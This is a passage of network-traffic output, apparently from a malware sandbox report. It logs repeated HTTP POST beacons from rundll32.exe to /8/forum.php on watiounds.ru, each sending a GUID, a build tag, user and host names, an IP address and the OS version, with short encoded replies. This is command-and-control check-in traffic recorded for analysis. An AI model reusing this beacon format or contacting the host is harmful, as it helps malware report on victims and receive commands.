                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:27.045412064 CEST191INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYCXBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          14192.168.2.224917995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:19:47.252847910 CEST39OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:47.381026983 CEST40INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 47 54 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKGTPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          140192.168.2.224930595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:27.368114948 CEST192OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:27.497481108 CEST192INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          141192.168.2.224930695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:27.818994045 CEST193OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:27.949532032 CEST193INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 48 53 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMHSNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          142192.168.2.224930795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:28.266843081 CEST194OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:28.388788939 CEST194INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFGTUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          143192.168.2.224930895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:28.707127094 CEST195OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:28.831115961 CEST195INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 46 55 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNFUMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          144192.168.2.224930995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:29.152132034 CEST196OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:29.278121948 CEST196INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVKPEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          145192.168.2.224931095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:29.592197895 CEST197OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:29.723362923 CEST198INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4a 51 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCJQXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          146192.168.2.224931195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:30.049376011 CEST198OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:30.178198099 CEST199INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTCXGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          147192.168.2.224931295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:30.512536049 CEST200OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:30.642143965 CEST200INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKTGPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          148192.168.2.224931395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:31.008846045 CEST201OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:31.131063938 CEST201INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMKPNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          149192.168.2.224931495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:31.514576912 CEST202OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:31.645745993 CEST202INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 54 47 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGTGTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          15192.168.2.224918095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:20:02.548259974 CEST42OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:02.672324896 CEST43INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 51 4a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYQJBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          150192.168.2.224931595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:31.971333981 CEST203OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:32.097831011 CEST203INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCYBXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          151192.168.2.224931695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:32.745980024 CEST204OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:32.872827053 CEST204INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJAZQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          152192.168.2.224931795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:33.711646080 CEST205OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:33.841691017 CEST205INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMVENARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          153192.168.2.224931895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:34.168292046 CEST206OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:34.292617083 CEST207INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAVEZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          154192.168.2.224931995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:34.622296095 CEST207OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:34.756405115 CEST208INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZGTAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          155192.168.2.224932095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:35.073648930 CEST208OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
